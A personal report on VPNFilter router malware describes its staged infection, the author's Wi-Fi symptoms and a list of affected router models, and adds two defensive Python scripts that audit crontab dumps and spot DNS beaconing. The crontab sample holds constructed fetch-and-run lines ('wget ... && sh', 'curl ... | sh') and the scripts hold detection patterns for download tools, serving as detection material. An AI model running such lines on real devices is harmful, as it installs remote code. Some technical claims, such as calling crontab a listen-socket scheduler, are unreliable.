A Report on the VPNFilter W.O.R.M.

My Netgear WNDR3700v4 was intermittently losing its ability to transmit and receive data on its 2.4 GHz radio band.

According to the FBI and Cisco Talos, the malware infects affected routers in stages.

The software installs itself in multiple stages:

  1. Stage 1 is the worm component. It adds an entry to the device’s crontab (the list of tasks that the cron scheduler runs at regular intervals on Linux), which lets it survive a reboot and re-infect the device with the later stages if they are removed. Stage 1 contacts known URLs to locate and install the Stage 2 malware. If those URLs are taken down, Stage 1 opens a listening socket on the device and waits to be contacted by the command-and-control infrastructure.
  2. Stage 2 is the body of the malware: the code that carries out its normal functions and executes whatever the optional Stage 3 modules request.
  3. Stage 3 consists of optional plug-in “modules” that give the malware specific capabilities, such as monitoring industrial control traffic (Modbus SCADA) or communicating with its operators over the Tor anonymity network.
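The following script is an added example (not code from the original post, Cisco Talos, or the FBI) of how to audit a crontab dump for the kind of persistence job described in Stage 1. Pull the crontab off the device first (`crontab -l` on a BusyBox router, or the file under /etc/crontabs/) and run the script on a workstation, since most routers ship without Python. The heuristics, the writable-directory list and the sample crontab are all constructed assumptions; none of the paths or addresses are real VPNFilter indicators.

```python
"""Audit a crontab dump for the kind of persistence entry described for
VPNFilter stage 1: a job that keeps re-fetching or re-launching later
stages. This is an added example, not code from the original post or
from any VPNFilter analysis; the heuristics, directory list and the
sample crontab below are constructed assumptions."""
import re
from dataclasses import dataclass

# Directories that are writable at runtime on most Linux-based routers.
# Legitimate cron jobs rarely execute binaries from here (assumption).
WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/var/run/", "/dev/shm/")
DOWNLOADERS = re.compile(r"\b(wget|curl|tftp|ftpget)\b")
PIPE_TO_SHELL = re.compile(r"\|\s*(ba)?sh\b")
BARE_IP_URL = re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}")

# Constructed sample, in the format `crontab -l` prints on a BusyBox
# system. The last three jobs imitate stage-1 persistence; the paths
# and addresses are placeholders, not real indicators.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /sbin/logrotate /etc/logrotate.conf
@reboot /usr/sbin/ntpd -n
# the jobs below are constructed to resemble stage-1 persistence
*/5 * * * * /var/run/.upd
17 */2 * * * wget -q http://203.0.113.7/s2 -O /tmp/s2 && sh /tmp/s2
* * * * * curl -s http://198.51.100.9/x | sh
"""


@dataclass
class Finding:
    line_no: int
    schedule: str
    command: str
    reasons: list


def parse_crontab(text):
    """Yield (line_no, schedule, command) for each job, skipping comments,
    blank lines and VAR=value assignments. @reboot-style schedules are
    a single field; ordinary ones are five."""
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        if line.startswith("@"):
            parts = line.split(None, 1)
            sched, cmd = parts[0], (parts[1] if len(parts) > 1 else "")
        else:
            parts = line.split(None, 5)
            if len(parts) < 6:
                continue  # malformed line; cron would reject it too
            sched, cmd = " ".join(parts[:5]), parts[5]
        yield n, sched, cmd


def is_frequent(minute, hour):
    """True when the job fires at least every 10 minutes around the clock."""
    if hour != "*":
        return False
    m = re.fullmatch(r"\*(?:/(\d+))?", minute)
    return bool(m) and (m.group(1) is None or int(m.group(1)) <= 10)


def audit_crontab(text):
    """Return a Finding for every job that trips at least one heuristic."""
    findings = []
    for n, sched, cmd in parse_crontab(text):
        reasons = []
        fields = sched.split()
        if len(fields) == 5 and is_frequent(fields[0], fields[1]):
            reasons.append("runs at least every 10 minutes")
        if any(d in cmd for d in WRITABLE_DIRS):
            reasons.append("uses a volatile, runtime-writable directory")
        if DOWNLOADERS.search(cmd):
            reasons.append("fetches content from the network")
        if BARE_IP_URL.search(cmd):
            reasons.append("URL points at a bare IP address")
        if PIPE_TO_SHELL.search(cmd):
            reasons.append("pipes downloaded content straight into a shell")
        if reasons:
            findings.append(Finding(n, sched, cmd, reasons))
    return findings


if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB):
        print(f"line {f.line_no}: [{f.schedule}] {f.command}")
        for r in f.reasons:
            print(f"    - {r}")
```

A hit is a lead, not a verdict: vendor jobs that call wget for firmware checks will also trip the downloader rule, so compare each flagged command against what the stock firmware is known to schedule before drawing conclusions.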

My issue was that the FBI had sunk the sites that the WORM relied on, so it kept sending download requests to them with no answer. This eventually made my network useless on the 2.4 GHz radio band.
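What a sinkholed Stage 1 looks like from the outside is a device that keeps asking for the same download host on a fixed schedule. The script below is an added example (not from the original post) that runs that check over dnsmasq-style query log lines: it groups queries by client and domain and flags any series whose spacing is nearly constant. The log lines, the domain names and the jitter threshold are constructed assumptions, not real VPNFilter indicators.

```python
"""Spot a process that keeps querying a sinkholed download domain at a
fixed interval, which is what a stage-1 implant looks like from the
DNS side once its download URLs have been taken down. Added example,
not from the original post; the dnsmasq-style log lines and the
domain names are constructed and stand in for no real indicator."""
import re
from collections import defaultdict
from datetime import datetime
from statistics import median

# One dnsmasq query line per request; reply lines are ignored.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ dnsmasq\[\d+\]: "
    r"query\[\w+\] (?P<domain>\S+) from (?P<client>\S+)$"
)

# Constructed sample: "sinkholed.example" plays the role of a seized
# download domain, queried from the router's own resolver (127.0.0.1).
SAMPLE_LOG = """\
Jun  1 10:00:03 router dnsmasq[812]: query[A] update.example from 192.168.1.20
Jun  1 10:00:05 router dnsmasq[812]: query[A] sinkholed.example from 127.0.0.1
Jun  1 10:00:05 router dnsmasq[812]: reply sinkholed.example is 192.0.2.1
Jun  1 10:05:05 router dnsmasq[812]: query[A] sinkholed.example from 127.0.0.1
Jun  1 10:07:41 router dnsmasq[812]: query[A] update.example from 192.168.1.20
Jun  1 10:10:06 router dnsmasq[812]: query[A] sinkholed.example from 127.0.0.1
Jun  1 10:15:05 router dnsmasq[812]: query[A] sinkholed.example from 127.0.0.1
Jun  1 10:20:04 router dnsmasq[812]: query[A] sinkholed.example from 127.0.0.1
Jun  1 10:25:05 router dnsmasq[812]: query[A] sinkholed.example from 127.0.0.1
Jun  1 10:31:12 router dnsmasq[812]: query[A] update.example from 192.168.1.20
Jun  1 10:58:47 router dnsmasq[812]: query[A] update.example from 192.168.1.20
"""


def query_series(log_text):
    """Group query timestamps by (client, domain), in log order."""
    series = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")
            series[(m["client"], m["domain"])].append(ts)
    return series


def find_beacons(log_text, min_queries=4, max_jitter=0.1):
    """Return {(client, domain): period_seconds} for series whose gaps
    are nearly constant. The thresholds are tunable assumptions, not
    values from any published analysis."""
    beacons = {}
    for key, times in query_series(log_text).items():
        if len(times) < min_queries:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        period = median(gaps)
        if period > 0 and (max(gaps) - min(gaps)) / period <= max_jitter:
            beacons[key] = period
    return beacons


if __name__ == "__main__":
    for (client, domain), period in find_beacons(SAMPLE_LOG).items():
        print(f"{client} -> {domain} every {period:.0f}s")
```

Because the check keys on periodicity rather than on the answer, it fires whether the seized domain now returns a sinkhole address or nothing at all, and it works just as well against an implant whose download hosts have not been published yet.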

Normally a router factory reset would get rid of Stage 2 and Stage 3; however, since it initially embeds itself into the firmware at Stage 1, there is no way to fully get rid of it. From my own experience, the VPNFilter WORM attaches itself to the crontab (the router’s listen-socket on/off scheduler) and sets a random scheduled listening time each time you do a factory reset.

Below is the Wikipedia article, with its list of devices affected by the vulnerability that allows the VPNFilter WORM to install itself.

https://en.wikipedia.org/wiki/VPNFilter#Devices_at_risk

Asus:

    RT-AC66U
    RT-N10
    RT-N10E
    RT-N10U
    RT-N56U
    RT-N66U

D-Link:

    DES-1210-08P
    DIR-300
    DIR-300A
    DSR-250N
    DSR-500N
    DSR-1000
    DSR-1000N

Huawei:

    HG8245

Linksys:

    E1200
    E2500
    E3000
    E3200
    E4200
    RV082
    WRVS4400N

Mikrotik:

    CCR1009
    CCR1016
    CCR1036
    CCR1072
    CRS109
    CRS112
    CRS125
    RB411
    RB450
    RB750
    RB911
    RB921
    RB941
    RB951
    RB952
    RB960
    RB962
    RB1100
    RB1200
    RB2011
    RB3011
    RB Groove
    RB Omnitik
    STX5

    Mikrotik RouterOS versions up to 6.38.5 on current or 6.37.5 on bug-fix release chains.

Netgear:

    DG834
    DGN1000
    DGN2200
    DGN3500
    FVS318N
    MBRN3000
    R6400
    R7000
    R8000
    WNR1000
    WNR2000
    WNR2200
    WNR4000
    WNDR3700
    WNDR4000
    WNDR4300
    WNDR4300-TN
    UTM50

QNAP:

    TS251
    TS439 Pro
    Other QNAP NAS devices running QTS software

TP-Link:

    R600VPN
    TL-WR741ND
    TL-WR841N

Ubiquiti:

    NSM2
    PBE M5

Upvel:

    Unknown models

ZTE:

    ZXHN H108N

Epidemiology

Cisco Talos describes VPNFilter as having infected as many as 500,000 devices worldwide, in perhaps 54 countries, with a disproportionate share of the infections in Ukraine.

That being said, I strongly urge people to upgrade to a new device, or to replace their current router with one that is not listed above.
